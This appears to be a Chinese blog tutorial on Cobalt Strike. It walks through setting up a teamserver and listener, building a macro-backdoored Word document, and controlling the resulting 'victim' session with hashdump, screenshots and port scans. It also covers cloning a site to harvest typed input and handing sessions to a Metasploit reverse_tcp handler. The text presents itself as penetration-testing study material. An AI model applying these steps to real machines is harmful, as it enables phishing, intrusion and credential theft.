Cobal Strike的学习与使用

Cobal Strike的学习与使用

Cobalt Strike 是一款基于 java 的渗透测试神器,常被业界人称为 CS(全文简称 CS)神 器。3.0 改版后作为一个独立的平台使用。分为客户端与服务端,服务端是一个,客户 端可以有多个,可被团队进行协同操作,共享攻击资源与目标信息和sessions,可模拟 APT 做模拟对抗,进行内网渗透。

——

Cobalt Strike 集成了端口转发、扫描多模式端口 Listener、Windows exe 程序生成、
Windows dll 动态链接库生成、java 程序生成、office 宏代码生成、木马捆绑、钓鱼攻击
等功能。

把下载好的cs文件夹在Linux放一份,Windows放一份。
Cobal Strike的学习与使用_第1张图片

——
——

Linux服务端设置

团队服务器最好运行在Linux,服务端关键文件 teamserver 和 cobaltstrike.jar
执行teamsever.sh文件,IP为此Linux的IP,123456为后面客户端的连接密码。
回显信息中能够看到给出的连接端口。

./teamserver.sh 192.168.1.1 123456

Cobal Strike的学习与使用_第2张图片

客户端新建连接,填写作为服务端的IP,还有设置好的密码,给出的端口,用户名随意。
想要连接上,服务端必须想上面一样开着。
Cobal Strike的学习与使用_第3张图片
——
——

Windows客户端设置

新建监听

Cobal Strike的学习与使用_第4张图片

配置
Cobal Strike的学习与使用_第5张图片
在地下可以看到设置好的监听。
Cobal Strike的学习与使用_第6张图片

———
——

尝试生成后门文件

攻击-生成后门-ms office
这里尝试生成word文件后门
Cobal Strike的学习与使用_第7张图片
点击选择刚刚创建的监听器
Cobal Strike的学习与使用_第8张图片

然后弹出这个,点击copy复制代码。
Cobal Strike的学习与使用_第9张图片

然后新建一个word文件。
点击新建宏,刚刚copy 的内容复制进去。
保存方式后缀启用宏。
Cobal Strike的学习与使用_第10张图片
点击创建之后,把刚刚copy的代码全部粘贴进去。然后保存即可。
Cobal Strike的学习与使用_第11张图片

然后另存这个文件,并选择启用宏的word模板。
Cobal Strike的学习与使用_第12张图片
——
——

受害者上线

当目标打开这个文件的时候,可以看到成功上线。
Cobal Strike的学习与使用_第13张图片

右键受害机进入beacon会话
Cobal Strike的学习与使用_第14张图片

执行 cmd 命令需要使用“shell”+执行的命令,其他命令可使用 help
ipconfig,命令 shell ipconfig
Cobal Strike的学习与使用_第15张图片

受害机屏幕截图

screenshot

Cobal Strike的学习与使用_第16张图片

执行成功后可看到截图
Cobal Strike的学习与使用_第17张图片

端口扫描

选择目标–>端口扫描
portscan [ip] 命令
Cobal Strike的学习与使用_第18张图片

会自动识别目标机所在的内网 ip 段,可选择 ARP,ICMP,none 三种方式进
行扫描,ports 中填入你要扫描的端口
Cobal Strike的学习与使用_第19张图片

扫描
Cobal Strike的学习与使用_第20张图片
——

读取用户密码

hashdump

需要administrator权限
请添加图片描述

——
——

受害机中可关闭进程停止监听。

tasklist 看进程
taskkill /F -pid 19280
Cobal Strike的学习与使用_第21张图片

——
——

克隆网站测试

Cobal Strike的学习与使用_第22张图片

设置克隆网站,端口,主机地址默认为服务端的IP,点击克隆即可。
Cobal Strike的学习与使用_第23张图片

——
设置成功
Cobal Strike的学习与使用_第24张图片

——
访问
Cobal Strike的学习与使用_第25张图片

——
然后查看web日志,就可以看到在上面网站中输入的内容了。
Cobal Strike的学习与使用_第26张图片

——
——

Cobalt Strike 与 与 msf 的联动

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
2.在 Cobalt Strik 中执行,先添加一个监听命令,名称为:msf payload 选择:
windows/foreign/reverse_tcp 监听端口:4444

选择受害者主机,然后右击 Spawn

在 msf 下即可反弹出 meterpreter 会话。

你可能感兴趣的:(工具使用,cs,Cobal,Strike,后门)